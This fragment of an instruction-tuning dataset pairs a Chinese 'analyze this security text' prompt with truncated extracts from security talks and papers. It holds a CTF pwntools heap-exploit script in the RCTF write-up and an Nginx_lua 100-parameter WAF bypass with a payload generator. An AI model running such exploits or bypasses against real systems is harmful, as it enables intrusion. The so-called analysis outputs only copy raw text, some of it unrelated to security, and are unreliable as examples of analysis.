attack  Rootkits are fun : a lot to learn & challenge  Reproduce the attack scenario and implement it! GSM Network Architecture 5 GSM Network Architecture 6 Regin targets GSM Networks 7 Determining Attack Surface 8 Determining Attack Surface 9 Determining Attack Surface 10 Potential Attack Surfaces 11  Absence of physical intrusion detection devices  Vulnerable services running accessible from BTS  Absence of tamper resistance and unauthorized access protection  Improper network segmentation; inner non- routable segments of the Telco company could accessible.  Core GPRS Network and Network Subsystem (NSS) could be exploitable! Potential Attack Surfaces 12 GRX Networks 13 GRX Networks 14  GPRS roaming exchange, interconnecting networks.  Your local GSM provider abroad  Trust-based, highly interconnected network, made for internet sharing  A failure or malicious activ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMSI - Microsoft Windows Installer Elevation of Privilege Summary: The Microsoft Windows Installer permits under some circumstances to a standard user an arbitrary permissions and content overwrite with SYSTEM privileges. ( Microsoft Windows Installer: https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-portal ) Products affected: Windows 10 Enterprise (1903) with latest security update (2019 November patch) and probably also other versions (not tested). Windows 10 Enterprise - INSIDER PREVIEW (Fast ring) 10.0.19033 - Build 19033 Description: It is possible and allowed by Windows Installer service to install a MSI package as standard user. I have noticed, in my research, that when a standard user installs a MSI package , the Windows Installer service triggers some operations with SYSTEM privileges. (see image below from Procmon) Going forward with my research I found that, after a package is installed on the system, a standard user could force a repair of the product with /f command line parameter. In our case, for example, command msiexec /qn /fa foo.msi triggers the repair operation . With this command Ive seen a couple of interesting operations came out that caught my attention. As SYSTEM, the Windows Installer service try to set the permissions of the package files that are going to be reinstalled. After that, it read and writes the content of the package files ( stored within msi package ). See image below from Procmon. As we can see, the first time Windows Installer service tries to open one the files impersonating the standard user but as a result it gets a PRIVILEGE NOT HELD, then, after that, it closes the file and reopens it as SYSTEM without impersonating! Afterward it continues to set the permissions of the file as SYSTEM and writes its content. This is clearly a point of possible exploitation! In order to obtain the desired a result, a race condition has to be successfully exploited. The race condition is going to occur between the momen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" -*- tcl -*- doctools manpage '\\\" '\\\" Generated from ./modules/html/html.man by mpexpand with fmt.nroff '\\\" .TH \"html\" 3tcl 1.2.1 html \"HTML Generation\" .SH NAME html \\- 产生 HTML 框架的子程序 .SH \"总览 SYNOPSIS\" package require \\fBTcl 8.2\\fR .sp package require \\fBhtml ?1.2.1?\\fR .sp \\fB::html::author\\fR \\fIauthor\\fR\\fR .sp \\fB::html::bodyTag\\fR \\fIargs\\fR\\fR .sp \\fB::html::cell\\fR \\fIparam value\\fR ?\\fItag\\fR?\\fR .sp \\fB::html::checkbox\\fR \\fIname value\\fR\\fR .sp \\fB::html::checkSet\\fR \\fIkey sep list\\fR\\fR .sp \\fB::html::checkValue\\fR \\fIname\\fR ?\\fIvalue\\fR?\\fR .sp \\fB::html::closeTag\\fR \\fR .sp \\fB::html::default\\fR \\fIkey\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::description\\fR \\fIdescription\\fR\\fR .sp \\fB::html::end\\fR \\fR .sp \\fB::html::eval\\fR \\fIarg\\fR ?\\fIargs\\fR?\\fR .sp \\fB::html::extractParam\\fR \\fIparam key\\fR ?\\fIvarName\\fR?\\fR .sp \\fB::html::font\\fR \\fIargs\\fR\\fR .sp \\fB::html::for\\fR \\fIstart test next body\\fR\\fR .sp \\fB::html::foreach\\fR \\fIvarlist1 list1\\fR ?\\fIvarlist2 list2 ...\\fR? \\fIbody\\fR\\fR .sp \\fB::html::formValue\\fR \\fIname\\fR ?\\fIdefvalue\\fR?\\fR .sp \\fB::html::getFormInfo\\fR \\fIargs\\fR\\fR .sp \\fB::html::getTitle\\fR \\fR .sp \\fB::html::h\\fR \\fIlevel string\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h1\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h2\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h3\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h4\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h5\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::h6\\fR \\fIstring\\fR ?\\fIparam\\fR?\\fR .sp \\fB::html::hdrRow\\fR \\fIargs\\fR\\fR .sp \\fB::html::head\\fR \\fItitle\\fR\\fR .sp \\fB::html::headTag\\fR \\fIstring\\fR\\fR .sp \\fB::html::if\\fR \\fIexpr1 body1\\fR ?\\fBelseif\\fR \\fIexpr2 body2 ...\\fR? ?\\fBelse\\fR \\fIbodyN\\fR?\\fR .sp \\fB::html::keywords\\fR \\fIargs\\fR\\fR .sp \\fB::html::mailto\\fR \\fIemail\\fR ?\\fIsubject\\fR?\\fR .sp \\fB::html::meta\\fR \\fIargs\\fR\\fR .sp \\fB::html::minorMenu\\fR \\fIlist\\fR ?\\fIsep\\fR?\\fR .sp \\fB::html::minorList\\fR \\fIlist\\fR ?\\fIordered\\fR?\\fR .sp \\fB::html::op", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis talk is not about LTE vulnerabilities No cables Why isnt it working? Scared Poopless  LTE and *your* laptop Disclaimer: During the slides you will be exposed to hacker stock photos from the internet. Thank you! Goldy aSmig @octosavvi Intel Security would like to acknowledge and thank the Huawei PSIRT team for their responsiveness and cooperation on this issue.  CVE-2015-5367: Insecure Linux Image in Firmware  CVE-2015-5368: Insecure Firmware Update Authentication http://huawei.com/en/security/psirt/security- bulletins/security-advisories/hw-446601.htm DEMO What did I just see? This is not a problem Remember kids! This is why you should do secure firmware updates NEVER FORGET Adam Caudill Brandon Wilson Who are we? @jessemichael @laplinker Background  Internal LTE/3G modems and who uses them? I like to use my own keyboard  Internal LTE/3G modems and who uses them?  Business class devices I think I have an idea!  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in anyway? Card against humanity 2015 world champion  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in anyway?  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in anyway? PCIe 2, SATA, USB 2.0 and 3.0, Audio, PCM, IUM, SSIC and I2C I forgot macs dont have a CD drive anymore  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in anyway?  USB?! Crap! I just stabbed my usb thumb drive!  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in?  USB?!  Why hack this device anyway? Respect the gas/ski mask Background  Internal LTE/3G modems and who uses them?  Business class devices  How is it plugged in?  USB?!  Why hack this device anyway?  Module available worldwide  Its plugged in [INSIDE] your laptop/tablet  Software  Firmware  Hardware  Software  Windows utility for firmware updates  Firmware  Hardware  Software  Windows utility fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GoReleaser - https://github.com/goreleaser/goreleaser --- 自动化打包工具 --- **安装** - https://github.com/goreleaser/goreleaser/releases --- **使用** 在目标目录执行 goreleaser init 将会生成一个 `.goreleaser.yml` 配置文件 修改配置,例如 ```yml # This is an example .goreleaser.yml file with some sane defaults. # Make sure to check the documentation at http://goreleaser.com before: hooks: # You may remove this if you don't use go modules. #- go mod tidy # you may remove this if you don't need go generate #- go generate ./... builds: - env: - CGO_ENABLED=0 id: \"anewproject\" binary: \"anew\" goos: - linux - windows - darwin goarch: - amd64 archives: - replacements: darwin: Darwin linux: Linux windows: Windows 386: i386 amd64: x86_64 checksum: name_template: 'checksums.txt' snapshot: name_template: \"v1.0.0-snapshot\" changelog: sort: asc filters: exclude: - 'docs:' - 'test:' ``` **打包** ``` goreleaser --snapshot --skip-publish --rm-dist ``` 这里可能会提示 ```  release failed after 2.94s error=failed to build for darwin_amd64: go: cannot find main module, but found .git/config in C:\\xxx ``` 直接 ``` go mod init hello ``` 再运行一遍就可以了 如果提示一下报错 ``` couldn't guess project_name, please add it to your config ``` 添加一行就行 ```yaml project_name: myproject ``` **main.go 不在根目录的情况** ```yaml # .goreleaser.yaml builds: - main: ./path/to/your/main/pkg/ ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNir Valtman, CISSP Blog: www.valtman.org Twitter: @ValtmaNir Bug Bounty Programs Evolution 2 Im an architect Zombies!!! 5 Defacement 6 AntiDef OPEN SOURCE Memory Scraper Secure TDD Research Bug Bounty Programs Since 2011 Academy Final Project If you cant beat them, join them! Not cost-effective Virtual Environment Bounty Hunter Safe Bug Bounty Program Shay Fainberg Ideas worth spreading The Evolution Bounty Hunters in Real Life Terms & Conditions Successful Kill $ Successful Kill Good Reputation Targets Politicians VIP Men Women Kids Animals Hit men st ...REFINE BETA VERSIONS AND ENSURE HIGHEST QUALITY SOFTWARE Winners Awards Success || Failure Story? Success 2004 Perspectives on Bug Bounty Programs Business Bounty Hunter Business Start Your Own Online Program Technology Operations Legal Start Your Own Online Program Technology Operations Legal Handle heavy traffic Start Your Own Online Program Technology Operations Legal Stronger IPS Start Your Own Online Program Technology Operations Legal Stronger WAF Start Your Own Online Program Technology Operations Legal Bugs Management Incident Response Start Your Own Online Program Technology Operations Legal Liability Self-Owned External External A-TEAM External Identity Verification External External Traffic Shaping Benefits Concerns Benefits Payment Models Real-World Hacking Scenario Security Leader Positioning Benefits Concerns Concerns Production Test Sensitive Data Leakage Denial of Service Black Hats Detection Companys Perimeter Non-security Bugs Handling Side Effects Minimize Exposure Time Perspectives on Bug Bounty Programs Business Bounty Hunter Bounty Hunter Motivation Frustration Name: Oren Hafif Source: www.orenh.com Case Study Actual Risk Exposing all hosted email addresses in Google 1st Response DENIED! 2nd Response $500 Reward Next Generation Bug Bounty Programs Minimize Production Risks Minimize Production Risks Allow Penetration Tests Prevent Malicious Exploitation Minimize Production Risks web service web", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMALWARE MIGRATING TO GAMING CONSOLES Embedded devices, an AntiVirus-free safe hideout for Malware Ahn Ki-Chan - Hanyang University, Undergraduate Ha Dong-Joo - AhnLab Inc., Security Researcher About Introduction - Embedded systems(gaming consoles, smartphones, etc.) have enough hardware for malware to survive and perform it's job - There are not so many publicly disclosed issues of malware on these devices which make people think that they are safe - The possibilities of malware on embedded systems and the resulting effects will be shown in this presentation with some real world examples, along with some possible defenses About Index Background Knowledge - The pirate scene of Gamine consoles and Smartphones - The current state of malware on embedded devices - The mindset of the general public The attacker's point of view - Gaming consoles as an attacking tool - Hacking with NDS - Malware on Console Gaming systems - Malware on Wii - Malware injection on Smartphone applications - Malware on Smartphones Preparation - Our defenses - Manufacturers : Steps to take when designing a new device - Service, Security companies : Measurements in Software or Policies - Users : Precautions for the general users About Background Knowledge The pirate scene of Gamine consoles and Smartphones Background Knowledge Payed software being illegally downloaded - Most embedded devices implement anti pirate Measures by some means, but these protections are eventually bypassed Background Knowledge - The pirate scene of Gamine consoles and Smartphones The distribution of illegal software - Just like PC software, illegal software is Being distributed without any restrictions via P2P, torrents, web storage - Easily accessible by the general public Background Knowledge - The pirate scene of Gamine consoles and Smartphones The current state of malware on embedded devices Background Knowledge Malware on Gaming Consoles - Disguises itself as a useful homebrew application, and lures users to install i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNginx_lua 100参数绕过原理详解 一环境搭建 Nginx_lua 安装 https://github.com/openresty/lua-nginx-module#installation 安装完之后可以在nginx.conf 写入配置可以动态在Nginx 层面进行过滤和调度 这里使用一个很简单的方式来展示绕过的原理 wget 'https://openresty.org/download/nginx-1.19.3.tar.gz' tar -xzvf nginx-1.19.3.tar.gz cd nginx-1.19.3/ # tell nginx's build system where to find LuaJIT 2.0: export LUAJIT_LIB=/path/to/luajit/lib export LUAJIT_INC=/path/to/luajit/include/luajit-2.0 # tell nginx's build system where to find LuaJIT 2.1: export LUAJIT_LIB=/path/to/luajit/lib export LUAJIT_INC=/path/to/luajit/include/luajit-2.1 # Here we assume Nginx is to be installed under /opt/nginx/. ./configure --prefix=/opt/nginx \\ --with-ld-opt=\"-Wl,-rpath,/path/to/luajit/lib\" \\ --add-module=/path/to/ngx_devel_kit \\ --add-module=/path/to/lua-nginx-module # Note that you may also want to add `./configure` options which are used in your # current nginx build. # You can get usually those options using command nginx -V # you can change the parallism number 2 below to fit the number of spare CPU cores in your # machine. make -j2 make install location = /api2 { content_by_lua_block { tmp='' for i,v in pairs(ngx.req.get_uri_args()) do 这里是意思是访问/api2 然后返回get的所有参数默认他是接受100个参数当超过100个参数的时候会 默认不会记录这样达成了一个绕过的一个方式演示如下 首先先发送两个id 过去试试 那么试试id1->id100 if type(i)=='string' then tmp=tmp..i..' ' end end ngx.header.content_type = \"application/json;\" ngx.status = 200 ngx.say(tmp) ngx.exit(200) } } a='' for i in range(1,102): a=a+'id'+str(i)+'=11&' print(a) 返回从1-100 但是没有id101 那么这个id101 哪里去了呢 那么看看ngx.req.get_uri_args() 这个函数是怎么实现的 二源码解析 参考文章: https://blog.csdn.net/liujiyong7/article/details/37692027 src/ngx_http_lua_module.c为模块主入口文件 注册函数的写法有统一的格式 GET /api2? id1=11&id2=11&id3=11&id4=11&id5=11&id6=11&id7=11&id8=11&id9=11&id10=11&id11=11&i d12=11&id13=11&id14=11&id15=11&id16=11&id17=11&id18=11&id19=11&id20=11&id21=11&i d22=11&id23=11&id24=11&id25=11&id26=11&id27=11&id28=11&id29=11&id30=11&id31=11&i d32=11&id33=11&id34=11&id35=11&id36=11&id37=11&id38=11&id39=11&id40=11&id41=11&i d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD u m a r t f u z z e r  M a k e t h e d u m b f u z z e r s m a r t 陈振宇 个人安全研究员 背景  内存类漏洞占很大比例  Fuzzing仍然是发现内存类漏洞的重要手段  有源码fuzzing工具已经很完善  无源码fuzzing的方法缺点较多一般无源码 的Fuzzing也叫黑盒fuzz  有时不得不进行黑盒fuzz如闭源项目 背景黑盒fuzz的困难  状态机  dlopen  qemu, unicorn  效率低  缺乏路径反馈  没有路径反馈的一般称为dumb fuzz反之会叫smart fuzz  没有地址消杀器  fuzzing without ASAN is a waste of CPU 状态机是什么为什么麻烦  所有CPU以及内存里的值  指针虚函数表等  变量内存里保存的值  某状态时cpu寄存器的值 大型软件中对象间有聚合依赖 包含所有对象都需要满足才能运行 要运行fuzz有时即使有源码也是很 复杂的事情  背景如何能做一个最简单的黑盒fuzz  简单来说需要2点  1fuzz就是不断地运行某一段代码每次运行输入变异了的参数  2要运行一段代码需要准备好代码运行的上下文这个上下文有时又叫状态机 状态机如何简单地获取状态机提高效率  状态机天然在存在我们的测试环境里业务可以正常运行  直接发送报文效率低只能从处理入口开始fuzz崩溃检测慢  如果可以在正常运行的程序中注入我们的代码就可以获得这个状态机和不断运行被测试对象 效率会大大提升 进程注入( https://github.com/gaffe23/linux-inject)  使用系统调用fork保存系统状态  在新进程中可以选择任意函数甚至任意片段进行fuzz 目标进程 libfuzzer.s o inject Fork process with state machine libfuzzer.so fork 新进程是Fuzzer 原进程继续运行 状态机注入原理  是通过ptrace在目标进程写入一段二进制代码  二进制代码执行了__libc_dlopen_mode把 目标库加载进进程空间  恢复进程原本上下文 目标进程 inject bin code libfuzzer.so 加载 状态机: 为什么不在原进程fuzz  其实是可以的  但是  一些嵌入式系统有看门狗在原进程上fuzzing可能由于响应慢等导致非漏洞的重启  需要启动一个新线程来做fuzz  效率较低  全局变量的访问 Fuzzer: 快照快照的作用  Afl 有fork server会不停地执行fork来运行一次测 试对象  Fork可以恢复运行的状态但是时间开销较大  Afl就有persistent mode减少fork开销假定每次 运行都是无状态的 重复运行测试对象  Dumart fuzzer模仿persistent mode保存快照 用于恢复 Fuzzer: 保存快照怎么保存  内存:  扫描进程的内存空间保存目标的可写段  所有堆内存  不是一个变量一个变量地记录整个段保存下来  寄存器:  在需要保存状态的地方设置断点通过断点处理程序记录寄存器状态 Fuzzer: 崩溃检测  内存类漏洞崩溃时到底发生了什么?  收到信号SIGSEGV  注册SIGSEGV信号处理程序接管SIGSEGV信号  Unique crash detect: 检查RIP是否唯一  Unique crash 则保存输入  恢复上下文 SIGSEGV handler 保存输入及定 位信息 检测unique crash 恢复状态继 续fuzz YES NO Fuzzer: 路径反馈是什么  路径反馈可以让fuzz运行的更深  发现更多问题  这是smart fuzz和dumb fuzz最重要的区别 Fuzzer: 路径反馈  通过ida脚本把被测对象的所有block的地址记录下来  断点  在每个代码块的起始地址改写为断点指令(int 3)  注册信号处理程序  触发新代码块的输入作为种子保存  恢复原本的指令  继续运行 Block A Block B Block C Int 3 Int 3 Int 3 RIP Original code RIP Original code Fuzzer: 路径反馈  打断点  断点触发  恢复代码 ASAN是什么  发生内存类漏洞时程序是否一定有异常表现  NO如小量越界读写只要不是读写发生在非法地址程序是不会崩溃的  UAF类型漏洞程序崩溃现场调用栈上很可能是没有漏洞的因为这不是漏洞发生的第一 现场给定位问题带来困难 ASAN一种内存类型漏洞检测技术在溢出UAF等漏洞发生时马上触发程序崩溃 ASAN", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProtecting Data with Short- Lived Encryption Keys and Hardware Root of Trust Dan Griffin DefCon 2013 Time-Bound Keys Announcements  New tool: TimedKey.exe  New whitepaper: Trusted Tamperproof Time on Mobile Devices  Check out http://www.jwsecure.com/dan What does the NSA think?  The NSA has been public about:  Inevitability of mobile computing  Need to support cloud-based services  Even for use with secret data in the field  What works for them can work for you How does the cloud know  Who you are?  Where you are?  Is your computer acting on your behalf? Device Integrity  A device is silicon  It might be pretending to be me  It might be pretending to be you  Define device integrity to be truth telling  Is the device faithfully asserting delegation?  Is it faithfully representing the users intent? Current Technology Landscape  Why are mobile devices less secure?  Inconvenience of good passwords  Current antivirus is not up to the task  User-owned (BYOD/consumerization trends)  But mobile devices do have security features  Screen lock  Secure storage  TrustZone & Trusted Execution Environment  Trusted Platform Module Mobile Vulnerabilities  Rootkits got harder, bad apps got much easier  Mobile threat landscape:  Easy to steal the device  Easy to steal services  Easy to install apps that steal data  Even remote eavesdropping What is needed to be secure?  Encrypt user data  Sandbox apps  Secure, measured boot (TPM)  Remote platform attestation How to use a hardware root of trust  Device receives TPM-bound token  Sends token to relying party to prove status  Token can carry decryption key as well  If device is measured to be insecure  The good guys win!  Need to reset machine to clean it What is Remote Attestation?  Remote attestation is enabled by the TPM  Can a server know the truth about the client?  Use root of trust to measure boot chain and configuration  Remote attestation is a means to the truth  The TPM attests to device attributes  Rootkit-resistant, though not", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIPv6@ARIN Matt Ryanczak Network Operations Manager IPv6 Timeline IETF starts thinking about successors to IPv4. 1990 IETF forms IPNG area RFC 1475 TP/IX RFC 1550 IPng Paper Solicitation 1993 RFC1817 CIDR and Classful Routing RFC 1883 Draft IPv6 Spec 1995 6bone started RFC 1970 Neighbor Discovery RFC 1971 Address Autoconfig 1996 RFC 3775 IPv6 mobility RFC3697 Flow Label Spec RFC 2471 6bone phase out 2004 RFC 5095 Deprecation of Type 0 Routing Headers RFC 4942 IPv6 Security Considerations 2007 RFC 5722 Handling of overlappingIPv6 fragments 2009 RFC 5871 IANA Allocation Guidelines for the IPv6 Routing Header 2010 RFC 3315 DHCPv6 RFC 2553 Basic Socket Interface Extensions 2003 What happened to IPv5? The Internet Stream Protocol (ST, ST2, ST+)  First developed in the late 1970s (Internet Engineering Note 119, 1979)  Designed to transmit voice and other real time applications  Guaranteed bandwidth, QOS  Set the version field in IP header to 5  ST2 and ST+ saw interest from IBM, Sun and others in to the 1990s There were a lot of potential replacements for IPv4: RFC 1752 Recommendation for the IP Next Generation Protocol (Pv6) RFC 1475: TP/IX: The Next Internet (IPv7) RFC 1621: PIP - The P Internet Protocol (IPv8) RFC 1374: TUBA - TCP and UDP with Bigger Addresses (IPv9) RFC 1606: A Historical Perspective On The Usage Of IP Version 9 ARIN IPv6 Timeline Sprint IPv6 WWW, DNS, FTP Worldcom IPv6 WWW, DNS, FTP Equi6IX IPv6 WWW, DNS, FTP, V6 Peering NTT | Tinet IPv6 Whois, DNS, IRR, Peering 2003: Sprint  T1 via Sprint  Linux Router with Sangoma T1 Card  OpenBSD firewall  Linux-based WWW, DNS, FTP servers  Segregated network no dual stack (security concerns)  A lot of PMTU issues  A lot of routing issues  Service has gotten better over the years 2004: Worldcom  T1 via Worldcom to Equinix  Cisco 2800 router  OpenBSD firewall  Linux-based WWW, DNS, FTP servers  Segregated network no dual stack (security concerns)  A lot of PMTU Issues  A lot of routing issues 2006: Equi6IX  100 Mbit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Advanced MySQL Exploitation Muhaimin Dzulfakar muhaimindz@gmail.com 2 Contents 1 Abstract............................................................................................................................................3 2 Introduction ....................................................................................................................................3 3 Stacked Query.................................................................................................................................3 4 Attacking MySQL on applications that do support stacked queries...............................................4 5 Attacking MySQL on applications that do not support stacked queries........................................5 6 Fingerprinting the web server directory.........................................................................................7 6.1 Fingerprint through error message method................................................................................7 6.2 Fingerprint through LOAD_FILE method......................................................................................7 7 Maximum size of arbitrary code allowed........................................................................................7 8 Arbitrary file compression/decompression ....................................................................................8 9 Dealing with columns......................................................................................................................8 10 Remote code execution on LAMP.................................................................................................9 11 Remote code execution on WAMP.............................................................................................10 References ........................................................................................................................................11 3 1 Abstract This document discusses in detail how ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Journey into Hexagon Dissecting Qualcomm Basebands Seamus Burke Agenda  About me  Why Basebands?  History  Modern SoC Architecture  Hexagon  Cellular Stack architecture  Analysis About Me  Student, still finishing up my undergrad  Interested in kernel internals, exploit development, and embedded systems  Plays a lot of CTFs Goals  Find bugs in the baseband  Understand how it works and how it interacts with Android Prior Work Reverse Engineering a Qualcomm Baseband - Guillaume Delugré(fix char) Baseband Exploitation in 2013 - Ralph-Philipp Weinmann (PacSec 2013) Exploring Qualcomm Baseband via Modkit - Peter Pi, XiLing Gong, Gmxp (CSW 2018) Agenda  About me  Why Basebands?  History  Modern SoC Architecture  Hexagon  Cellular Stack architecture  Analysis What is a baseband exactly?  The chip in a phone which communicates with the cellular network  Handles the radio signal processing over the air  Has to support a large number of standards - (GSM,UMTS,CDMA2k,cdmaOne, GPRS,EDGE, LTE, etc)  The phones main interface to the rest of the world Why Qualcomm?  By far the largest market share of any baseband processor  Most high-end phones on the market, at least till recently carried a qcom chip inside. Basebands today  Separate cellular and application processors  Some sort of communication between them  Both have access to RAM CP AP RAM Agenda  About me  Why Basebands?  History  Modern SoC Architecture  Hexagon  Cellular Stack architecture  Analysis RTOS  Real-time, embedded operating systems.  2 major categories  Unprotected - logical and physical addresses are the same  Protected - virtual memory  Time bound, with well defined time constraints REX - Real-time Executive  The original kernel which ran the modem  Designed for the 80186, then ported to ARM  Single process, multiple threads  Everything runs in supervisor mode  Tasks are basically the threads of REX.  Every task has a TCB storing the the SP, priority, stack_limit, etc  Each task has its own stack, when tasks ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRCTF WriteUp By Nu1L Author:Nu1L RCTF WriteUp By Nu1L Pwn Pokemon game sharing musl ezheap catch_the_frog unistruct warmnote Web ns_shaft_sql CandyShop VerySafe hiphop Easyphp xss it? EasySQLi Reverse sakuretsu Program Logic: Reverse Engineering Techniques Used: Solving: LoongArch Valgrind Hi!Harmony! dht two_shortest Crypto Uncommon Factors I Uncommon Factors II BlockChain EasyFJump HackChain Misc ezshell monopoly checkin coolcat welcome_to_rctf FeedBack Pwn Pwn Pokemon 给可达鸭讲话时存在溢出 溢出改下个chunk的size利password来leak之后改指针来改free_hook from pwn import * import fuckpy3 context.log_level = 'debug' # p = process(\"./Pokemon\") p = remote('123.60.25.24', 8888) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def launch_gdb(): print(pidof(p)) input() def xor_str(a,b): res = '' for i in range(len(a)): res += chr(a[i]  b[i%8]) return res.bytes() def add(type,s=0,idx = 0): p.sendlineafter(\":\",\"1\") p.sendlineafter(\":\",str(type)) if s != 0: p.sendlineafter(\"?\",str(s)) p.sendlineafter(\"]\",str(idx)) def dele(i,need = False): p.sendlineafter(\":\",\"2\") p.sendlineafter(\"[0/1]\",str(i)) p.sendlineafter(\"Choice:\",\"1\") if need: p.sendlineafter(']','Y') p.sendlineafter(\":\",\"aaaaa\") # talk # p.sendlineafter(\":\",\"2\") # p.sendlineafter(\"]\",\"0\") # p.sendlineafter(\":\",\"3\") # for i in range(17): # p.send(p64(0xdeadbeef) * 2) for i in range(7): add(1,0x220) dele(0) add(1,0x300) dele(0) add(1,0x310) dele(0) add(1,0x220) add(1,0x300,1) dele(0) add(1,0x300,0) for i in range(5): add(1,0x300,1) dele(0) add(2) p.sendlineafter(\":\",\"2\") p.sendlineafter(\"]\",\"0\") p.sendlineafter(\":\",\"3\") for i in range(16): p.send(p64(0xdeadbeef) * 2) p.send(p64(0) + p64(4704 + 1)) dele(0,True) dele(1) # 01AE9 add(1,0x300) add(1,0x300,1) dele(1) p.sendlineafter(\":\",\"3\") p.sendlineafter(\"]\",\"1\") add(1,0x310,1) p.sendlineafter(\":\",\"3\") p.recvuntil('gem: ') leak = u64(p.recv(6) + b'\\x00\\x00') - 2014176 log.info('leak ' + hex(leak)) p.sendlineafter(\"]\",\"N\") dele(1) add(1,0x300,0) add(3,idx=1) game 怪那有个奇怪的uaf预先填好个Libc的地址可以leak p.sendline", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRemote Attacks Against SOHO Routers 08 February, 2010 Craig Heffner Abstract This paper will describe how many consumer (SOHO) routers can be exploited via DNS re-binding to gain interactive access to the router's internal-facing Web based administrative interface. Unlike other DNS re-binding techniques, this attack does not require prior knowledge of the target router or the router's configuration settings such as make, model, IP address, host name, etc, and does not use any anti-DNS pinning techniques. Confirmed affected routers include those manufactured by Linksys, Belkin, ActionTec, Thompson, Asus and Dell, as well as those running third-party firmware such as OpenWRT, DD-WRT and PFSense. Existing Attacks and Their Limitations Many SOHO routers contain vulnerabilities that can allow an attacker to disrupt or intercept network traffic. These vulnerabilities include authentication bypass, cross-site scripting, information disclosure, denial of service, and perhaps the most pervasive vulnerability of them all, default logins [1, 2, 3]. However, these vulnerabilities all share one common trait: with very few exceptions they exist solely on the internal LAN, thus requiring an attacker to gain access to the LAN prior to exploiting a router's vulnerabilities. There are various existing attacks which may be employed by an external attacker to target a router's internal Web interface. These attacks are best delivered via an internal client's Web browser when that client browses to a Web page controlled by the attacker. Cross-Site Request Forgery (CSRF) is perhaps the easiest of these attacks and is well suited for exploiting authentication bypass vulnerabilities. However, it is restricted in several ways: 1. While it can be used to generate requests, it cannot be used to view the response. This is due to the browser's same-domain policy, and eliminates the possibility of using CSRF to exploit certain vulnerabilities, such as information disclosure vulnerabilities [4]. 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJoe Grand Zoz Brooks More Projects of...  Engineering entertainment program on Discovery Channel  Four guys building prototypes of crazy things  Followed the design/test/refine process  Limited time & budget per episode  Premiered October 2008 (US), ~February 2009 (World), 2012 (Netflix)  Thirteen episodes total Prototype This!  Original fan site: - http://dsc.discovery.com/tv/ prototype-this/prototype-this.html  Engineering documentation & details: - www.grandideastudio.com/prototype- this/ Prototype This! joe zoz mike terry grand brooks north sandin The \"Talent\" Production and Friends  Traffic Busting Truck  Fire Fighter PyroPack  Virtual Sea Adventure  Waterslide Simulator  Flying Lifeguard Previously @ DC17  Boxing Robots  Mind Controlled Car  6-Legged All Terrain Vehicle  Get Up and Go  Autonomous Pizza Delivery Now @ DC20  1st official build  ~2 weeks Boxing Robots  Controlled by players outside the ring  No $$$ for real mocap solution  Camera/AR + accelerometers  Built out of custom articulated steel skeleton  Covered in body made of recycled/surplus materials - Visual design by Nemo Gould (nemomatic)  Pneumatics controlled via ProXR RS-232 Relay Controller Boxing Robots vs.  Freescale ZSTAR Wireless 3-Axis Reference Design (MMA7260QT + MC13191 2.4GHz transceiver) on gloves  Highest sensitivity setting (6 Gs max) Boxing Robots  The boxing game: C/Windows due to camera drivers - IDS µEye LE compact CMOS industrial cameras  Shape filter for punch detection & classification  ARToolkit tracking for body orientation  Assembled motion queue and sent via UDP to pneumatics controller Boxing Robots  Health-o-Meter/Scoring System  BASIC Stamp 2  EFX-TEK RC-4 + Crydom D2W203F SSRs  Magnet + hall effect sensor in neck to determine a \"hit\"  Serial port I/F to communicate w/ Zoz's control S/W Boxing Robots Boxing Robots Mind Controlled Car  Anger Management Demolition Derby  Measure EKG, GSR, heart rate  Must stay calm/relaxed in order for car to move ANGER MANAGEMENT Mind Contr", "category": "text_analysis", "source": "security_papers"}
